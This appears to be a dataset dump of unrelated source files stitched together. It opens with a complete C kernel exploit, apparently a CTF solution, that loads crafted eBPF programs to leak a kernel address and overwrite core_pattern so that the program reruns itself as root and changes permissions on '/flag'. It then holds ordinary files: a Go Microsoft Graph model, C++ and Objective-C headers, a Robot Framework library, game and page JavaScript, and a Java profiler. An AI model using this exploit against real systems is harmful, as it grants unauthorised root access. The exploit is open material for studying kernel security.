// https://elixir.bootlin.com/linux/v5.12.9/source/include/uapi/linux/bpf.h#L365 #define bpf_ldimm64_or_special(dst_reg, src_reg, imm) \ bpf_insn(BPF_LD | BPF_DW | BPF_IMM, (dst_reg), (src_reg), 0, (imm) & 0xffffffff), \ bpf_insn(0, 0, 0, 0, (uint64_t)(imm) >> 32) #define bpf_load_imm64(dst_reg, imm) bpf_ldimm64_or_special(dst_reg, 0, imm) // When src_reg == BPF_PSEUDO_MAP_FD, this loads the address of a map into a register #define bpf_load_map(dst_reg, mapfd) bpf_ldimm64_or_special(dst_reg, BPF_PSEUDO_MAP_FD, mapfd) // Adjust these if you recompile the kernel // The build script exports symbols.txt into the challenge folder, grep for // core_pattern and array_map_ops to get the addresses. const uint64_t core_pattern_base = 0xffffffff8295fee0; // 0xffffffff8295fee0; const uint64_t array_map_ops_base = 0xffffffff8239d4c0; // 0xffffffff8239cb00; // Adjust this with the actual path to our exploit. const char path_to_exploit[] = "|/tmp/p\x00"; static char verifier_log[8192]; static struct bpf_insn bpf_insn(uint8_t opcode, uint8_t dst_reg, uint8_t src_reg, int16_t off, int32_t imm) { struct bpf_insn ret = { .code = opcode, .dst_reg = dst_reg, .src_reg = src_reg, .off = off, .imm = imm, }; return ret; } static struct bpf_insn bpf_load_imm32(uint8_t dst_reg, int32_t imm) { return bpf_insn(BPF_ALU64 | BPF_MOV | BPF_K, dst_reg, 0, 0, imm); } static struct bpf_insn bpf_exit(void) { return bpf_insn(BPF_JMP | BPF_EXIT, 0, 0, 0, 0); } static struct bpf_insn bpf_xor_imm32(uint8_t dst_reg, int32_t imm) { return bpf_insn(BPF_ALU64 | BPF_XOR | BPF_K, dst_reg, 0, 0, imm); } static struct bpf_insn bpf_xor_reg(uint8_t dst_reg, uint8_t src_reg) { return bpf_insn(BPF_ALU64 | BPF_XOR | BPF_X, dst_reg, src_reg, 0, 0); } static struct bpf_insn bpf_add_imm32(uint8_t dst_reg, int32_t imm) { return bpf_insn(BPF_ALU64 | BPF_ADD | BPF_K, dst_reg, 0, 0, imm); } static struct bpf_insn bpf_sub_reg64(uint8_t dst_reg, uint8_t src_reg) { return bpf_insn(BPF_ALU64 | BPF_SUB | BPF_X, dst_reg, src_reg, 
0, 0); } static struct bpf_insn bpf_mov_reg_reg(uint8_t dst_reg, uint8_t src_reg) { return bpf_insn(BPF_ALU64 | BPF_MOV | BPF_X, dst_reg, src_reg, 0, 0); } static struct bpf_insn bpf_call(int32_t function) { return bpf_insn(BPF_JMP | BPF_CALL, 0, 0, 0, function); } static struct bpf_insn bpf_jne_imm(uint8_t reg, int16_t dest, int32_t imm) { return bpf_insn(BPF_JMP | BPF_JNE | BPF_K, reg, 0, dest, imm); } // *(int32_t *)(base + offset) = imm static struct bpf_insn bpf_store_imm32(uint8_t base, int16_t offset, int32_t imm) { return bpf_insn(BPF_MEM | BPF_ST | BPF_W, base, 0, offset, imm); } // dst = *(uint64_t *)(base + offset) static struct bpf_insn bpf_load_reg64(uint8_t dst, uint8_t base, int16_t offset) { return bpf_insn(BPF_MEM | BPF_LDX | BPF_DW, dst, base, offset, 0); } // *(uint64_t *)(base + offset) = src static struct bpf_insn bpf_store_reg64(uint8_t base, int16_t offset, uint8_t src) { return bpf_insn(BPF_MEM | BPF_STX | BPF_DW, base, src, offset, 0); } static int load_prog(const struct bpf_insn *instructions, size_t size) { union bpf_attr attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insns = (uint64_t)instructions, .insn_cnt = size, .license = (uint64_t)"GPL", .log_level = 2, .log_buf = (uint64_t)verifier_log, .log_size = sizeof(verifier_log), }; int ret = syscall(SYS_bpf, BPF_PROG_LOAD, &attr, sizeof(attr)); if (ret < 0) { printf("Verifier returned %d, log: %s\n", ret, verifier_log); } return ret; } static int create_map(void) { union bpf_attr attr = { .map_type = BPF_MAP_TYPE_ARRAY, .key_size = 4, .value_size = 8, .max_entries = 0x100, }; return syscall(SYS_bpf, BPF_MAP_CREATE, &attr, sizeof(attr)); } static uint64_t read_map(int mapfd) { uint64_t out = 0; uint64_t key = 0; union bpf_attr attr = { .map_fd = mapfd, .key = (uint64_t)&key, .value = (uint64_t)&out, }; assert(syscall(SYS_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr)) >= 0); return out; } int main(void) { if (getuid() == 0) { // The kernel ran us as the core handler (as root), // change 
the permissions of the flag or something system("chmod 777 /flag"); return 0; } int mapfd = create_map(); assert(mapfd >= 0); const struct bpf_insn instructions[] = { // Store the map in r1 bpf_load_map(BPF_REG_1, mapfd), // Store the index (0) on the stack and a pointer to it in r2 bpf_store_imm32(BPF_REG_10, -4, 0), bpf_mov_reg_reg(BPF_REG_2, BPF_REG_10), bpf_add_imm32(BPF_REG_2, -4), // Get a pointer to the value in r0 bpf_call(BPF_FUNC_map_lookup_elem), // Exit if it's NULL to make the verifier happy bpf_jne_imm(BPF_REG_0, 1, 0), bpf_exit(), // to scalar bpf_xor_imm32(BPF_REG_0, 0), bpf_mov_reg_reg(BPF_REG_4, BPF_REG_0), bpf_mov_reg_reg(BPF_REG_5, BPF_REG_0), // to pointer and zero r4 bpf_xor_reg(BPF_REG_4, BPF_REG_4), // to scalar bpf_xor_imm32(BPF_REG_4, 0), // Move to the beginning of the struct where the ops pointer is stored bpf_add_imm32(BPF_REG_5, -0x110), bpf_xor_reg(BPF_REG_4, BPF_REG_5), // Read it out bpf_load_reg64(BPF_REG_5, BPF_REG_4, 0), // Compute the address of core_pattern bpf_load_imm32(BPF_REG_4, (int64_t)(array_map_ops_base - core_pattern_base)), bpf_sub_reg64(BPF_REG_5, BPF_REG_4), bpf_xor_imm32(BPF_REG_0, 0), bpf_store_reg64(BPF_REG_0, 0, BPF_REG_5), // Exit bpf_load_imm32(BPF_REG_0, 0), bpf_exit(), }; // Create and attach the filter int sockets[2]; int progfd = load_prog(instructions, ARRAY_SIZE(instructions)); assert(progfd >= 0); assert(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets) >= 0); assert(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) >= 0); // Run the filter write(sockets[0], "AAAA", 4); uint64_t core_pattern = read_map(mapfd); printf("core_pattern: %#lx\n", core_pattern); const struct bpf_insn instructions2[] = { // Store the map in r1 bpf_load_map(BPF_REG_1, mapfd), // Store the index (0) on the stack and a pointer to it in r2 bpf_store_imm32(BPF_REG_10, -4, 0), bpf_mov_reg_reg(BPF_REG_2, BPF_REG_10), bpf_add_imm32(BPF_REG_2, -4), // Get a pointer to the value in r0 
bpf_call(BPF_FUNC_map_lookup_elem), // Exit if it's NULL to make the verifier happy bpf_jne_imm(BPF_REG_0, 1, 0), bpf_exit(), // Turn it into a scalar bpf_xor_imm32(BPF_REG_0, 0), // Zero it (back to pointer) bpf_xor_reg(BPF_REG_0, BPF_REG_0), // Back to scalar bpf_xor_imm32(BPF_REG_0, 0), // Xor it with the address of core_pattern (back to pointer) bpf_load_imm64(BPF_REG_3, core_pattern), bpf_xor_reg(BPF_REG_0, BPF_REG_3), // Overwrite core_pattern with the path to our exploit bpf_load_imm64(BPF_REG_3, *(uint64_t *)path_to_exploit), bpf_store_reg64(BPF_REG_0, 0, BPF_REG_3), // Exit bpf_load_imm32(BPF_REG_0, 0), bpf_exit(), }; int progfd2 = load_prog(instructions2, ARRAY_SIZE(instructions2)); assert(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd2, sizeof(progfd2)) >= 0); write(sockets[0], "AAAA", 4); // Crash and run ourselves as the core handler asm volatile("ud2"); return 0; }
microsoftgraph/msgraph-beta-sdk-go
models/privileged_role_summary.go
<filename>models/privileged_role_summary.go package models import ( i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91 "github.com/microsoft/kiota-abstractions-go/serialization" ) // PrivilegedRoleSummary type PrivilegedRoleSummary struct { Entity // The number of users that have the role assigned and the role is activated. elevatedCount *int32 // The number of users that have the role assigned but the role is deactivated. managedCount *int32 // true if the role activation requires MFA. false if the role activation doesn't require MFA. mfaEnabled *bool // Possible values are: ok, bad. The value depends on the ratio of (managedCount / usersCount). If the ratio is less than a predefined threshold, ok is returned. Otherwise, bad is returned. status *RoleSummaryStatus // The number of users that are assigned with the role. usersCount *int32 } // NewPrivilegedRoleSummary instantiates a new privilegedRoleSummary and sets the default values. func NewPrivilegedRoleSummary()(*PrivilegedRoleSummary) { m := &PrivilegedRoleSummary{ Entity: *NewEntity(), } return m } // CreatePrivilegedRoleSummaryFromDiscriminatorValue creates a new instance of the appropriate class based on discriminator value func CreatePrivilegedRoleSummaryFromDiscriminatorValue(parseNode i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.ParseNode)(i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.Parsable, error) { return NewPrivilegedRoleSummary(), nil } // GetElevatedCount gets the elevatedCount property value. The number of users that have the role assigned and the role is activated. 
func (m *PrivilegedRoleSummary) GetElevatedCount()(*int32) { if m == nil { return nil } else { return m.elevatedCount } } // GetFieldDeserializers the deserialization information for the current model func (m *PrivilegedRoleSummary) GetFieldDeserializers()(map[string]func(i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.ParseNode)(error)) { res := m.Entity.GetFieldDeserializers() res["elevatedCount"] = func (n i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.ParseNode) error { val, err := n.GetInt32Value() if err != nil { return err } if val != nil { m.SetElevatedCount(val) } return nil } res["managedCount"] = func (n i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.ParseNode) error { val, err := n.GetInt32Value() if err != nil { return err } if val != nil { m.SetManagedCount(val) } return nil } res["mfaEnabled"] = func (n i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.ParseNode) error { val, err := n.GetBoolValue() if err != nil { return err } if val != nil { m.SetMfaEnabled(val) } return nil } res["status"] = func (n i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.ParseNode) error { val, err := n.GetEnumValue(ParseRoleSummaryStatus) if err != nil { return err } if val != nil { m.SetStatus(val.(*RoleSummaryStatus)) } return nil } res["usersCount"] = func (n i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.ParseNode) error { val, err := n.GetInt32Value() if err != nil { return err } if val != nil { m.SetUsersCount(val) } return nil } return res } // GetManagedCount gets the managedCount property value. The number of users that have the role assigned but the role is deactivated. func (m *PrivilegedRoleSummary) GetManagedCount()(*int32) { if m == nil { return nil } else { return m.managedCount } } // GetMfaEnabled gets the mfaEnabled property value. true if the role activation requires MFA. false if the role activation doesn't require MFA. 
func (m *PrivilegedRoleSummary) GetMfaEnabled()(*bool) { if m == nil { return nil } else { return m.mfaEnabled } } // GetStatus gets the status property value. Possible values are: ok, bad. The value depends on the ratio of (managedCount / usersCount). If the ratio is less than a predefined threshold, ok is returned. Otherwise, bad is returned. func (m *PrivilegedRoleSummary) GetStatus()(*RoleSummaryStatus) { if m == nil { return nil } else { return m.status } } // GetUsersCount gets the usersCount property value. The number of users that are assigned with the role. func (m *PrivilegedRoleSummary) GetUsersCount()(*int32) { if m == nil { return nil } else { return m.usersCount } } // Serialize serializes information the current object func (m *PrivilegedRoleSummary) Serialize(writer i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.SerializationWriter)(error) { err := m.Entity.Serialize(writer) if err != nil { return err } { err = writer.WriteInt32Value("elevatedCount", m.GetElevatedCount()) if err != nil { return err } } { err = writer.WriteInt32Value("managedCount", m.GetManagedCount()) if err != nil { return err } } { err = writer.WriteBoolValue("mfaEnabled", m.GetMfaEnabled()) if err != nil { return err } } if m.GetStatus() != nil { cast := (*m.GetStatus()).String() err = writer.WriteStringValue("status", &cast) if err != nil { return err } } { err = writer.WriteInt32Value("usersCount", m.GetUsersCount()) if err != nil { return err } } return nil } // SetElevatedCount sets the elevatedCount property value. The number of users that have the role assigned and the role is activated. func (m *PrivilegedRoleSummary) SetElevatedCount(value *int32)() { if m != nil { m.elevatedCount = value } } // SetManagedCount sets the managedCount property value. The number of users that have the role assigned but the role is deactivated. 
func (m *PrivilegedRoleSummary) SetManagedCount(value *int32)() { if m != nil { m.managedCount = value } } // SetMfaEnabled sets the mfaEnabled property value. true if the role activation requires MFA. false if the role activation doesn't require MFA. func (m *PrivilegedRoleSummary) SetMfaEnabled(value *bool)() { if m != nil { m.mfaEnabled = value } } // SetStatus sets the status property value. Possible values are: ok, bad. The value depends on the ratio of (managedCount / usersCount). If the ratio is less than a predefined threshold, ok is returned. Otherwise, bad is returned. func (m *PrivilegedRoleSummary) SetStatus(value *RoleSummaryStatus)() { if m != nil { m.status = value } } // SetUsersCount sets the usersCount property value. The number of users that are assigned with the role. func (m *PrivilegedRoleSummary) SetUsersCount(value *int32)() { if m != nil { m.usersCount = value } }
AllaMaevskaya/AliRoot
STEER/STEER/AliCorrQAChecker.h
#ifndef ALICORRQACHECKER_H
#define ALICORRQACHECKER_H
/* Copyright(c) 1998-1999, ALICE Experiment at CERN, All rights reserved. *
 * See cxx source for full Copyright notice                               */

/* $Id: AliCorrQAChecker.h 27115 2008-07-04 15:12:14Z hristov $ */

/*
  Checks the quality assurance.
  By comparing with reference data
  <NAME> CERN July 2007
*/

// --- ROOT system ---
class TFile ;
class TH1F ;
class TH1I ;

// --- Standard library ---

// --- AliRoot header files ---
#include "AliQACheckerBase.h"
class AliCorrLoader ;

// QA checker for the "Corr" (correlation) detector data; compares QA
// ntuples against reference data. Copy/assignment are intentionally
// disabled (declared private, not implemented).
class AliCorrQAChecker: public AliQACheckerBase {

public:
  AliCorrQAChecker() : AliQACheckerBase("Corr","Corr Quality Assurance Data Maker") {;}          // ctor
  virtual ~AliCorrQAChecker() {;} // dtor

  // Runs the QA check for the given task over the ntuple data.
  virtual void   Run(AliQAv1::ALITASK_t /*tsk*/, TNtupleD ** /*nt*/, AliDetectorRecoParam * /*recoParam*/) ;

private:
  AliCorrQAChecker(const AliCorrQAChecker& qac); // Not implemented
  AliCorrQAChecker& operator=(const AliCorrQAChecker& qac); // Not implemented
  // Helper performing the actual ntuple-based check; see cxx source.
  Double_t * CheckN(AliQAv1::ALITASK_t index, TNtupleD ** nData, AliDetectorRecoParam * recoParam) ;

  ClassDef(AliCorrQAChecker,1)  // description

};

#endif // AliCORRQAChecker_H
phil-davis/robotframework
atest/testdata/keywords/library_with_keywords_with_dots_in_name.py
class library_with_keywords_with_dots_in_name(object):
    """Dynamic Robot Framework test library exposing keywords whose names
    contain dots.

    Fix: removed a stray dataset-contamination line (``<reponame>...``) that
    preceded the class definition and made the module unimportable.
    """

    def get_keyword_names(self):
        """Return the keyword names implemented by this dynamic library."""
        return ['Dots.in.name.in.a.library',
                'Multiple...dots . . in . a............row.in.a.library',
                'Ending with a dot. In a library.']

    def run_keyword(self, name, args):
        """Execute any keyword: ignores ``name`` and joins ``args`` with '-'."""
        return '-'.join(args)
miladajilian/MimMessenger
submodules/LegacyComponents/LegacyComponents/TGBackdropView.h
#import <UIKit/UIKit.h>

// Backdrop view used behind navigation-bar-style chrome.
// (Removed stray dataset "<filename>"/"<gh_stars>" markers that preceded the
// import and made the header invalid.)
@interface TGBackdropView : UIView

// Factory returning a backdrop configured for the light navigation bar style.
+ (TGBackdropView *)viewWithLightNavigationBarStyle;

@end
jsmeow/nebluax
src/main/controller/entities/entity/game/combat/shield/shield.js
const { window } = require('../../../../../../options');
const CombatEntity = require('../combat-entity');
const timers = require('../../../../timers/entity-timers');
const update = require('../../../../update/update-entity');
const exception = require('../../../../../../exception/exception');
const emojis = require('emoji.json/emoji-compact.json');

/**
 * Shield combat entity attached to a parent entity.
 *
 * Spawns centered on its parent (parent position plus half the parent's
 * size, divided by the window scale — assumes parent coords are already
 * scaled; TODO confirm against CombatEntity), inherits the parent's
 * faction, and defaults to Shield.HEALTH when no health is given.
 *
 * @param {Object} args - entity options; must include args.parent.
 */
function Shield(args) {
  CombatEntity.call(
    this,
    Object.assign(args, {
      x: (args.parent.x + args.parent.width * 0.5) / window.scale,
      y: (args.parent.y + args.parent.height * 0.5) / window.scale,
      // Missing parent/faction raise via the exception module.
      parent: args.parent || exception.entity.args.parent(),
      faction: args.parent.faction || exception.entity.args.faction(),
      health: args.health || Shield.HEALTH
    })
  );

  // Add the shield timer to the timer list
  this.timers.shield = timers.game.shield();

  // Add the entity shield position action to the entity update actions list
  // (keeps the shield tracking its parent's position each frame).
  this.actions.push(update.game.position.shield);
}

// Classical prototype inheritance from CombatEntity.
Shield.prototype = Object.create(CombatEntity.prototype);

// Asset path, display emoji (index into the emoji table) and default health.
Shield.PATH = `${CombatEntity.PATH}/shield`;
Shield.EMOJI = emojis[3215];
Shield.HEALTH = 1;

module.exports = Shield;
mshrutm/javamelody
javamelody-core/src/main/java/net/bull/javamelody/internal/model/SamplingProfiler.java
/*
 * Copyright 2008-2019 by <NAME>
 *
 * This file is part of Java Melody.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package net.bull.javamelody.internal.model;

import java.io.Serializable;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collections;
import java.util.HashMap;
import java.util.Iterator;
import java.util.List;
import java.util.Map;

/**
 * Detect CPU hotspots CPU by periodic sampling of the stack-traces of the threads.
 * @author <NAME> with some ideas from C&amp;<NAME>
 */
public class SamplingProfiler {
	/**
	 * Excluded packages by default : those of the jvm, of tomcat...
	 */
	private static final String[] DEFAULT_EXCLUDED_PACKAGES = { "java.", "sun.", "com.sun.",
			"javax.", "org.apache.", "org.hibernate.", "oracle.", "org.postgresql.",
			"org.eclipse.", };

	/**
	 * Maximum number of methods to hold into memory
	 */
	private static final int MAX_DATA_SIZE = 10000;

	// Package prefixes (each normalized to end with '.') filtering which
	// stack frames are counted; see isPackageExcluded.
	private final String[] excludedPackages;

	private final String[] includedPackages;

	// Sample counts keyed by method; key and value are the same object so the
	// map acts as an interning set with a mutable count.
	private final Map<SampledMethod, SampledMethod> data = new HashMap<>();

	/**
	 * Sampled method.
	 * @author <NAME>
	 */
	public static class SampledMethod implements Comparable<SampledMethod>, Serializable {
		private static final long serialVersionUID = 1L;

		// Number of times this method was seen as the top non-filtered frame.
		private long count;

		private final String className;

		private final String methodName;

		private transient int hash;

		SampledMethod(String className, String methodName) {
			super();
			assert className != null;
			assert methodName != null;
			this.className = className;
			this.methodName = methodName;
			this.hash = className.hashCode() * 31 + methodName.hashCode();
		}

		// hash is transient
		private Object readResolve() {
			// recompute the cached hash after deserialization
			this.hash = className.hashCode() * 31 + methodName.hashCode();
			return this;
		}

		void incrementCount() {
			count++;
		}

		public long getCount() {
			return count;
		}

		void setCount(long count) {
			this.count = count;
		}

		public String getClassName() {
			return this.className;
		}

		public String getMethodName() {
			return this.methodName;
		}

		// Note: descending order by count (hottest first); not consistent
		// with equals, which compares class and method names.
		@Override
		public int compareTo(SampledMethod method) {
			return Long.compare(method.count, count);
		}

		@Override
		public int hashCode() {
			return hash;
		}

		@Override
		public boolean equals(Object obj) {
			if (this == obj) {
				return true;
			}
			if (obj == null) {
				return false;
			}
			if (getClass() != obj.getClass()) {
				return false;
			}
			final SampledMethod other = (SampledMethod) obj;
			return methodName.equals(other.methodName) && className.equals(other.className);
		}

		@Override
		public String toString() {
			return className + '.' + methodName;
		}
	}

	/**
	 * Constructor.
	 * Excluded packages by default "java,sun,com.sun,javax,org.apache,org.hibernate,oracle,org.postgresql,org.eclipse"
	 */
	public SamplingProfiler() {
		super();
		this.excludedPackages = DEFAULT_EXCLUDED_PACKAGES;
		this.includedPackages = null;
	}

	/**
	 * Constructor.
	 * @param excludedPackages List of excluded packages (can be null)
	 * @param includedPackages List of included packages (can be null)
	 */
	public SamplingProfiler(List<String> excludedPackages, List<String> includedPackages) {
		super();
		assert excludedPackages != null || includedPackages != null;
		// In general, there are either excluded packages or included packages.
		// (If both, excluded result has priority over included result: it excludes some included.)
		this.excludedPackages = verifyPackageNames(excludedPackages);
		this.includedPackages = verifyPackageNames(includedPackages);
	}

	/**
	 * Constructor.
	 * @param excludedPackages List of excluded packages separated by comma (can be null)
	 * @param includedPackages List of included packages separated by comma (can be null)
	 */
	public SamplingProfiler(String excludedPackages, String includedPackages) {
		this(splitPackageNames(excludedPackages), splitPackageNames(includedPackages));
		// In general, there are either excluded packages or included packages.
		// (If both, excluded result has priority over included result: it excludes some included.)
	}

	// Splits a comma-separated package list; returns null for null input.
	private static List<String> splitPackageNames(String packageNames) {
		if (packageNames == null) {
			return null;
		}
		return Arrays.asList(packageNames.split(","));
	}

	// Trims each name, rejects empty entries and appends a trailing '.' so
	// prefix matching cannot match a partial package segment.
	private String[] verifyPackageNames(List<String> packageNames) {
		if (packageNames == null) {
			return null;
		}
		final String[] packages = packageNames.toArray(new String[0]);
		for (int i = 0; i < packages.length; i++) {
			packages[i] = packages[i].trim(); // NOPMD
			if (packages[i].isEmpty()) {
				throw new IllegalArgumentException(
						"A package can not be empty, item " + i + " in " + packageNames);
			}
			if (!packages[i].endsWith(".")) {
				packages[i] = packages[i] + '.'; // NOPMD
			}
		}
		return packages;
	}

	/**
	 * Takes one sample: for every RUNNABLE thread (except the sampling thread
	 * itself), counts the topmost stack frame that is not filtered out.
	 */
	public synchronized void update() {
		final Map<Thread, StackTraceElement[]> stackTraces = Thread.getAllStackTraces();
		try {
			final Thread currentThread = Thread.currentThread();
			for (final Map.Entry<Thread, StackTraceElement[]> entry : stackTraces.entrySet()) {
				final Thread thread = entry.getKey();
				final StackTraceElement[] stackTrace = entry.getValue();
				if (stackTrace.length > 0 && thread.getState() == Thread.State.RUNNABLE
						&& thread != currentThread) {
					for (final StackTraceElement element : stackTrace) {
						if (!isPackageExcluded(element)) {
							addSample(element);
							break;
						}
					}
				}
			}
		} finally {
			limitDataSize();
		}
	}

	private void addSample(StackTraceElement element) {
		final SampledMethod key = new SampledMethod(element.getClassName(),
				element.getMethodName());
		// or final String key = element.getClassName() + '.' + element.getMethodName();
		SampledMethod method = this.data.get(key);
		if (method == null) {
			method = key;
			// or method = new SampledMethod(element.getClassName(), element.getMethodName());
			this.data.put(key, method);
		}
		// we could increment the value according to the increase of cpuTime for this thread,
		// but the interval between two samples is probably too large
		// for the cpu used by the thread between the two intervals to be related to this method
		method.incrementCount();
	}

	// Evicts the coldest entries (lowest counts first, raising the threshold
	// each pass) until the map is back under MAX_DATA_SIZE.
	private void limitDataSize() {
		long minCount = 1;
		int size = data.size();
		while (size > MAX_DATA_SIZE) {
			final Iterator<SampledMethod> iterator = data.keySet().iterator();
			while (iterator.hasNext() && size > MAX_DATA_SIZE) {
				final SampledMethod method = iterator.next();
				if (method.getCount() <= minCount) {
					iterator.remove();
					size--;
				}
			}
			minCount++;
		}
	}

	// A frame is filtered out when it matches an excluded prefix, or when an
	// include list exists and the frame matches none of its prefixes.
	private boolean isPackageExcluded(StackTraceElement element) {
		return excludedPackages != null && isPackageMatching(element, excludedPackages)
				|| includedPackages != null && !isPackageMatching(element, includedPackages);
	}

	private boolean isPackageMatching(StackTraceElement element, String[] packageNames) {
		final String className = element.getClassName();
		for (final String packageName : packageNames) {
			if (className.startsWith(packageName)) {
				return true;
			}
		}
		return false;
	}

	/**
	 * Returns up to {@code rows} hottest methods, sorted by descending sample count.
	 * @param rows maximum number of methods to return
	 * @return hottest sampled methods
	 */
	public synchronized List<SampledMethod> getHotspots(int rows) {
		final List<SampledMethod> methods = new ArrayList<>(data.values());
		Collections.sort(methods);
		return methods.subList(0, Math.min(rows, methods.size()));
	}

	/** Discards all collected samples. */
	public synchronized void clear() {
		data.clear();
	}
}
damedia/culture.ru
web/static/mk_exponats/js/exponats.js
// Exhibits ("exponats") listing page: hover highlight, horizontal jScrollPane
// scroller, type/category/tag filters, and an image carousel with zoom preview.
$(function(){
	// Highlight an exhibit tile while the mouse is over it.
	$('.el-one').hover(function(){
		$(this).addClass('el-one-hovered');
	}, function(){
		$(this).removeClass('el-one-hovered');
	});

	// jScrollPane instance and its API, shared with the handlers below.
	var scrollPane, api;

	$(window).load(function(){
		/*var recalcScrollPane = function() { var expMaxNum = 0, expThisNum = 0, expMaxLine; $('.line').each(function(){ expThisNum = $(this).find('.el-one').length; if (expThisNum > expMaxNum) { expMaxNum = expThisNum; expMaxLine = $(this); } }) var expLineLast = expMaxNum - 1; var expLineLastLeft = $('.el-one:eq('+expLineLast+')', expMaxLine).position().left; var expLineLastWidth = $('.el-one:eq('+expLineLast+')', expMaxLine).width(); $('.exponats-scroll').width(expLineLastLeft + expLineLastWidth + 250); /*if (scrollPane) { api.reinitialise(); } };*/

		// Initialize the horizontal scroll pane once images have loaded
		// (window.load), so widths are final.
		$('.exponats-scroll-pane').each(function(){
			scrollPane = $(this).jScrollPane({animateScroll:true});
			api = scrollPane.data('jsp');
			var throttleTimeout;
			$(window).bind(
				'resize',
				function() {
					if ($.browser.msie) {
						// IE repaints on every resize tick: throttle
						// reinitialise() to at most once per 50ms.
						if (!throttleTimeout) {
							throttleTimeout = setTimeout(
								function() {
									api.reinitialise();
									throttleTimeout = null;
								},
								50
							);
						}
					} else {
						api.reinitialise();
					}
				}
			);
			// Arrow buttons scroll by a fixed step.
			$('#scroll-right').bind(
				'click',
				function() {
					api.scrollByX(200);
				}
			);
			$('#scroll-left').bind(
				'click',
				function() {
					api.scrollByX(-200);
				}
			);
			scrollPane
				.bind(
					'mousewheel',
					function (event, delta, deltaX, deltaY) {
						// Translate vertical wheel movement into horizontal scrolling.
						api.scrollByX(delta*-100);
						return false;
					}
				)
				.bind(
					'jsp-scroll-x',
					function(event, scrollPositionX, isAtLeft, isAtRight) {
						// NOTE(review): debug logging left in production code.
						console.log('Handle jsp-scroll-x', this,
							'scrollPositionX=', scrollPositionX,
							'isAtLeft=', isAtLeft,
							'isAtRight=', isAtRight);
						// Hide the arrow on the side we can no longer scroll toward.
						if (isAtLeft) {
							$('#scroll-left').hide();
						} else if (isAtRight) {
							$('#scroll-right').hide();
						} else {
							$('#scroll-left').show();
							$('#scroll-right').show();
						}
					}
				)
		});
		// Trigger the zoom view for the initially active carousel image.
		$('#carousel img.active').click();
	})

	// Exhibit type tabs: the href fragment doubles as the CSS class of the
	// selected layout.
	$('#exp-types').on('click', 'a', function(){
		var type = $(this).attr('href').substr(1);
		$(this).parent().addClass('active').siblings().removeClass();
		$('#exponats-content').removeClass().addClass(type);
		api.reinitialise();
		return false;
	})

	// Category entries with a filter panel: toggle the panel, only one
	// category filtered at a time.
	$('#exp-categories').on('click', '.with-filter a', function(){
		var li = $(this).parent();
		// NOTE(review): debug logging left in production code.
		console.log(li.hasClass('filtered'));
		if(li.hasClass('filtered')) {
			li.removeClass('filtered')
			$('#exp-filter').slideUp();
		} else {
			li.addClass('filtered').siblings().removeClass('filtered');
			$('#exp-filter').show();
		}
		return false;
	})

	// Close button of the filter panel.
	$('#exp-filter').on('click', '#filter-handle', function(){
		$('#exp-categories li').removeClass('filtered');
		$('#exp-filter').slideUp();
	})

	// Alphabet strip: single-select toggle.
	$('.alphabet').on('click', 'a', function(){
		$(this).toggleClass('active').siblings().removeClass('active');
		return false;
	})

	// Removing a selected tag also de-activates the matching entry in the
	// filter results (matched by text).
	// NOTE(review): class is spelled 'fiter-results' (sic) -- it matches the
	// same spelling used below, presumably mirroring the markup; confirm.
	$('#exponats-tags').on('click', '.delete', function(){
		var tag = $(this).prev(),
			tagText = tag.text();
		$(this).parent().remove();
		$('.fiter-results a').filter(function(index) {
			return $(this).text() === tagText;
		}).removeClass('active');
	})

	// Clicking a filter result toggles it: add/remove the corresponding tag
	// chip in #exponats-tags (matched by text).
	$('#exp-filter .fiter-results').on('click', 'a', function(){
		var tag = $(this),
			tagText = tag.text(),
			newTag;
		if(tag.hasClass('active')) {
			$(this).removeClass('active');
			$('#exponats-tags a').filter(function(index) {
				return $(this).text() === tagText;
			}).parent().remove();
		} else {
			newTag = $('<li><a href="#">'+tagText+'</a><span class="delete"></span></li>')
			newTag.appendTo('#exponats-tags');
			$(this).addClass('active');
		}
		return false;
	})

	// Thumbnail carousel; wheel moves it via the prev/next buttons.
	$('#carousel').jcarousel({});
	$(".jcarousel-container")
		.mousewheel(function(event, delta) {
			if (delta < 0) $(".jcarousel-next").click();
			else if (delta > 0) $(".jcarousel-prev").click();
			return false;
		});

	// Clicking a thumbnail marks it active (with an <i> border overlay) and
	// swaps the zoomed image, recentering it via negative margins.
	// NOTE(review): borderWidth/borderHeight are computed but unused.
	$('#carousel').on('click', 'img', function(){
		var borderWidth = $(this).width() - 4,
			borderHeight = $(this).height() - 4,
			imgBorder = $('<i style="width:'+36+'px; height:'+48+'px; "></i>'),
			fullImageSrc = $(this).attr('data-fullimage'),
			fullImageWidth,
			fullImageHeight;
		$(this).parent().append(imgBorder)
			.siblings().find('i').remove();
		$(this).addClass('active')
			.parent().siblings().find('img').removeClass('active');
		$('.main-zoomed-image img').css('opacity',0).attr('src',fullImageSrc );
		fullImageWidth = $('.main-zoomed-image img').width();
		fullImageHeight = $('.main-zoomed-image img').height();
		$('.main-zoomed-image img').css({
			'opacity':1,
			'marginLeft':-fullImageWidth/2,
			'marginTop':-fullImageHeight/2
		})
	})

	// Hover preview: a floating copy of the thumbnail, centered above it.
